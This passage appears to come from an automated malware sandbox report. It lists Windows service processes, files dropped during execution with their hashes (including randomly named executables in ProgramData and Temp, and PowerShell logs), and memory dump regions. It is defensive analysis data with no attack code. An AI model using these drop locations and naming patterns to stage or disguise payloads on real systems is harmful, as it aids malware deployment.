                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                              C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                                              1⤵
                                                                                                                                PID:3860
                                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                1⤵
                                                                                                                                  PID:2500
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                  1⤵
                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                  PID:2700
                                                                                                                                • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                  1⤵
                                                                                                                                  • Drops file in System32 directory
                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                  PID:868
                                                                                                                                • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                  C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                  1⤵
                                                                                                                                    PID:2900
                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                    1⤵
                                                                                                                                      PID:1868
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                      1⤵
                                                                                                                                        PID:2028
                                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                        1⤵
                                                                                                                                          PID:4360
                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                          1⤵
                                                                                                                                            PID:3768
                                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                            1⤵
                                                                                                                                              PID:4228

                                                                                                                                            Network

                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                            Replay Monitor

                                                                                                                                            Loading Replay Monitor...

                                                                                                                                            Downloads

                                                                                                                                            • C:\ProgramData\1ZRs6.EXe

                                                                                                                                              Filesize

                                                                                                                                              163KB

                                                                                                                                              MD5

                                                                                                                                              b20e29f2b88234cda8b95b43a4fec8aa

                                                                                                                                              SHA1

                                                                                                                                              13cca52a0dc3b9b352e14688f444ad9bcb9a9f4f

                                                                                                                                              SHA256

                                                                                                                                              e2481565a6c7a26690e99f63eea8e04615f7b3d92ca4ada11e331ce1053f962a

                                                                                                                                              SHA512

                                                                                                                                              019a4afbcd4c6236c226a05b0864df4f310fb91d41847dfcd84207d276a6219f66b725f5d3f637e7049d87fc81c88b8969a3061970be505bade70f767511313a

                                                                                                                                            • C:\ProgramData\FMyUS.eXe

                                                                                                                                              Filesize

                                                                                                                                              13KB

                                                                                                                                              MD5

                                                                                                                                              02a326274f6fbc2c10002e6989f4571f

                                                                                                                                              SHA1

                                                                                                                                              5d5aee1b6829fa401036968a034440fc07582191

                                                                                                                                              SHA256

                                                                                                                                              b677c04687a6360ba75cc71d70331b46c00794cbffc3a65205207a8369df4015

                                                                                                                                              SHA512

                                                                                                                                              30928b18c60eef0ba28017d1bdd8608a0ae51b006d4da6fd68b25aa7c639991ba720752cd6c346db14d32d5caa6a89355b70b31a6fd85187930740fd55524743

                                                                                                                                            • C:\ProgramData\svOrbEl0.exe

                                                                                                                                              Filesize

                                                                                                                                              33KB

                                                                                                                                              MD5

                                                                                                                                              ccb23d1b4b52148a5b74f598b9cf34eb

                                                                                                                                              SHA1

                                                                                                                                              f9ac40de5bc8e0c7e534609c4a6e1261045cc24f

                                                                                                                                              SHA256

                                                                                                                                              53b972cd3facf2433a36caff23b3d962c2ea303dc3bcae84d80c2929862fae2a

                                                                                                                                              SHA512

                                                                                                                                              61556840d43ffd924eea1d9ddc3661e4869c0259db4bcf2319d3453c6feac1c547d984dc9f60370928ab18cddd722367e1191112b1abc579b352058336f19f0a

                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                              Filesize

                                                                                                                                              2KB

                                                                                                                                              MD5

                                                                                                                                              88dc70c361a22feac57b031dd9c1f02f

                                                                                                                                              SHA1

                                                                                                                                              a9b4732260c2a323750022a73480f229ce25d46d

                                                                                                                                              SHA256

                                                                                                                                              43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59

                                                                                                                                              SHA512

                                                                                                                                              19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c

                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svOrbEl0.exe.log

                                                                                                                                              Filesize

                                                                                                                                              654B

                                                                                                                                              MD5

                                                                                                                                              2cbbb74b7da1f720b48ed31085cbd5b8

                                                                                                                                              SHA1

                                                                                                                                              79caa9a3ea8abe1b9c4326c3633da64a5f724964

                                                                                                                                              SHA256

                                                                                                                                              e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3

                                                                                                                                              SHA512

                                                                                                                                              ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                              Filesize

                                                                                                                                              1KB

                                                                                                                                              MD5

                                                                                                                                              31806cd8738c3fc9d54d11f0a26d1b64

                                                                                                                                              SHA1

                                                                                                                                              48f12fc30a924257faa30ac62c560df8ed8680d9

                                                                                                                                              SHA256

                                                                                                                                              520ab6654a552530acd69450cedffd2ecd3c188eca568fe019dfae15765085dd

                                                                                                                                              SHA512

                                                                                                                                              e2509fb8834ad20215a58ca9b2b7ba45535b7f53ce15201cc715ca6b803439afee30f4a79268d5d633a50be8868d6109332cb891afac50b43f27b75391d530da

                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                              Filesize

                                                                                                                                              944B

                                                                                                                                              MD5

                                                                                                                                              d0a4a3b9a52b8fe3b019f6cd0ef3dad6

                                                                                                                                              SHA1

                                                                                                                                              fed70ce7834c3b97edbd078eccda1e5effa527cd

                                                                                                                                              SHA256

                                                                                                                                              21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31

                                                                                                                                              SHA512

                                                                                                                                              1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                              Filesize

                                                                                                                                              944B

                                                                                                                                              MD5

                                                                                                                                              8cb7f4b4ab204cacd1af6b29c2a2042c

                                                                                                                                              SHA1

                                                                                                                                              244540c38e33eac05826d54282a0bfa60340d6a1

                                                                                                                                              SHA256

                                                                                                                                              4994013dabe4f131d401879278eee147add6349124ea6452358dca7e2344c7a6

                                                                                                                                              SHA512

                                                                                                                                              7651cb6863a425840db610253151e271d3e8da26a8c633ce484247266fa226792ecb84b9578df3ab17fef84a5dfcad417b63a7df59c9650a907e08d59b91dd6e

                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                              Filesize

                                                                                                                                              944B

                                                                                                                                              MD5

                                                                                                                                              69416944dac24129d0969e2ac46f0533

                                                                                                                                              SHA1

                                                                                                                                              d71969659956b32411e0606a9bee640a0b108ef4

                                                                                                                                              SHA256

                                                                                                                                              dffc7e01106427982d7cafd3d7e3be37e16b098fbb0958410ea8d7c68bfb97ca

                                                                                                                                              SHA512

                                                                                                                                              aabb330053579af0d9de2661bd70eaadfd2e2e617759bc9c380db1c64731c6711304e49882138e9d337815377ee012a7458f91f692cb31538d73624385867f4c

                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                              Filesize

                                                                                                                                              944B

                                                                                                                                              MD5

                                                                                                                                              e61edb16cdbb2186810317d065dfe40b

                                                                                                                                              SHA1

                                                                                                                                              c77ba1bf8f601ba4c07e916bb6fe67134be450ec

                                                                                                                                              SHA256

                                                                                                                                              fbcedbb534ba6877c42e4a727d9ae05cc9766405de14e78643b31e6f4f0c14af

                                                                                                                                              SHA512

                                                                                                                                              0f4a01911169ee482077cb5424e971a94e4f2d2de02a1f9dff2248971232ea39b2a5b62ae1ee12d14dcf0fcdfb3d87e2618c7004a158c0ae514ba1e8c84d35e7

                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                              Filesize

                                                                                                                                              944B

                                                                                                                                              MD5

                                                                                                                                              4397b0d1a82fec8a95f1ab53c152c5a5

                                                                                                                                              SHA1

                                                                                                                                              3632ed4f2b65fd0df29b3d3725e3a611d2e1adf7

                                                                                                                                              SHA256

                                                                                                                                              10cece13749ac090c815e53dc5e248b4b9c3ba93dc3d434d97d22f12a3906734

                                                                                                                                              SHA512

                                                                                                                                              f0d21ab75d08e1cb4ac83507f9ca41ef5365027b0d7e27747ded44b76fdb0346ca2d7499697802c5b67696e0c73716fcfab698825a143515151001690804d59f

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w5xnkvmg.vtj.ps1

                                                                                                                                              Filesize

                                                                                                                                              60B

                                                                                                                                              MD5

                                                                                                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                              SHA1

                                                                                                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                              SHA256

                                                                                                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                              SHA512

                                                                                                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\sZbXOBIH.exe

                                                                                                                                              Filesize

                                                                                                                                              5KB

                                                                                                                                              MD5

                                                                                                                                              f6515df66debd922c1d9699648bc06bd

                                                                                                                                              SHA1

                                                                                                                                              b4f7d322b28db243e2c05f140705daf7e187d1ca

                                                                                                                                              SHA256

                                                                                                                                              5c3eaf6874c3bbda22c734b4ae2738cd3f2ac5f43f38c3065567fa872396c796

                                                                                                                                              SHA512

                                                                                                                                              93f37508e5c0139c850bdabda0e6b8f961e668f14a73ba317f0b7424272a4f2c0cbd4ed36c50ca2c75d3ab15b13e70876d0c6cc7e15cc6af2c517786b40f99be

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\tmp

                                                                                                                                              Filesize

                                                                                                                                              14B

                                                                                                                                              MD5

                                                                                                                                              ce585c6ba32ac17652d2345118536f9c

                                                                                                                                              SHA1

                                                                                                                                              be0e41b3690c42e4c0cdb53d53fc544fb46b758d

                                                                                                                                              SHA256

                                                                                                                                              589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3

                                                                                                                                              SHA512

                                                                                                                                              d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752

                                                                                                                                            • memory/468-115-0x00000249BD350000-0x00000249BD37A000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              168KB

                                                                                                                                            • memory/468-120-0x00000249BD350000-0x00000249BD37A000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              168KB

                                                                                                                                            • memory/468-121-0x00007FFBD3130000-0x00007FFBD3140000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              64KB

                                                                                                                                            • memory/636-85-0x0000021457150000-0x0000021457175000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              148KB

                                                                                                                                            • memory/636-87-0x0000021457180000-0x00000214571AA000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              168KB

                                                                                                                                            • memory/636-92-0x0000021457180000-0x00000214571AA000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              168KB

                                                                                                                                            • memory/636-86-0x0000021457180000-0x00000214571AA000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              168KB

                                                                                                                                            • memory/636-93-0x00007FFBD3130000-0x00007FFBD3140000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              64KB

                                                                                                                                            • memory/704-103-0x00007FFBD3130000-0x00007FFBD3140000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              64KB

                                                                                                                                            • memory/704-97-0x000001F6841B0000-0x000001F6841DA000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              168KB

                                                                                                                                            • memory/704-102-0x000001F6841B0000-0x000001F6841DA000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              168KB

                                                                                                                                            • memory/988-125-0x000002A73A390000-0x000002A73A3BA000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              168KB

                                                                                                                                            • memory/992-107-0x00000246A8960000-0x00000246A898A000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              168KB

                                                                                                                                            • memory/1028-133-0x00000239904F0000-0x000002399051A000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              168KB

                                                                                                                                            • memory/3588-13-0x000002AD308B0000-0x000002AD308D2000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              136KB

                                                                                                                                            • memory/3588-16-0x000002AD490C0000-0x000002AD49282000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              1.8MB

                                                                                                                                            • memory/3588-701-0x00007FFBF2250000-0x00007FFBF2D12000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              10.8MB

                                                                                                                                            • memory/3588-4-0x00007FFBF2253000-0x00007FFBF2255000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              8KB

                                                                                                                                            • memory/3588-14-0x00007FFBF2250000-0x00007FFBF2D12000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              10.8MB

                                                                                                                                            • memory/3588-15-0x00007FFBF2250000-0x00007FFBF2D12000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              10.8MB

                                                                                                                                            • memory/3752-73-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              32KB

                                                                                                                                            • memory/3752-80-0x00007FFC130A0000-0x00007FFC132A9000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              2.0MB

                                                                                                                                            • memory/3752-79-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              32KB

                                                                                                                                            • memory/3752-81-0x00007FFC11A90000-0x00007FFC11B4D000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              756KB

                                                                                                                                            • memory/3752-72-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              32KB

                                                                                                                                            • memory/3752-75-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              32KB

                                                                                                                                            • memory/3752-74-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              32KB

                                                                                                                                            • memory/3752-82-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              32KB

                                                                                                                                            • memory/4472-52-0x0000000000050000-0x000000000005E000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              56KB

                                                                                                                                            • memory/4688-69-0x000001DF58D10000-0x000001DF58D3A000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              168KB

                                                                                                                                            • memory/4688-70-0x00007FFC130A0000-0x00007FFC132A9000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              2.0MB

                                                                                                                                            • memory/4688-71-0x00007FFC11A90000-0x00007FFC11B4D000-memory.dmp

                                                                                                                                              Filesize

                                                                                                                                              756KB